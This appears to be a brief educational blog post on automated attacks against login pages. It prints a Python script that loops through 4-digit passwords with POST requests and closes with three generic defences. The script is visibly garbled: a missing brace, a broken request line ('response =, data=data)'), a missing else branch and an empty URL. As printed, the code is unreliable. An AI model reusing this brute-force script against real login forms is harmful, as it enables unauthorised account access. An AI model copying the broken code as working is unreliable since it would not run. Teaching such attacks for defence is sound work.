Cybersecurity: What is Automated Attacks?


2 min read


Automated attacks refer to vulnerabilities where attackers use computer programs or scripts to automatically target a system.

Vulnerability Points

  • Login page

  • Post submission

  • Social media sharing page

Vulnerability Verification Methods

  • Repeatedly attempting requests without any issues

Attack Methods

Attack Scenarios

Common scenarios for automated attacks can include:

  • Using automated tools to repeatedly attempt logins.

  • The attacker captures the passwords of users with weak passwords.

Occurrence Process

Attack Example

The following example is a Python code designed to repeatedly attempt logins on a login site that has only a 4-digit password, written in PHP.

import requests

url = '<>'
username = 'test'
password = '1234'

# Create a session
session = requests.Session()

# Send POST requests
for i in range(1, 9999):
    data = {
        'user_id': username,
        'user_pass': i

    response =, data=data)

    # Check the response
    if response.status_code == 200:
        print('Request Password: ', i)
        print('Response Content:', response.text)
        print('Request failed. Status code:', response.status_code)


  1. Strong Authentication and Encryption: Prevent malicious access by using robust CAPTCHA authentication methods and encryption.

  2. Network Security: Monitor network traffic and detect malicious activities using firewalls, intrusion detection systems, and other security measures.

  3. Web Application Security: Adhere to secure coding practices to prevent vulnerabilities in web applications and implement appropriate web application firewalls.

Did you find this article valuable?

Support Han by becoming a sponsor. Any amount is appreciated!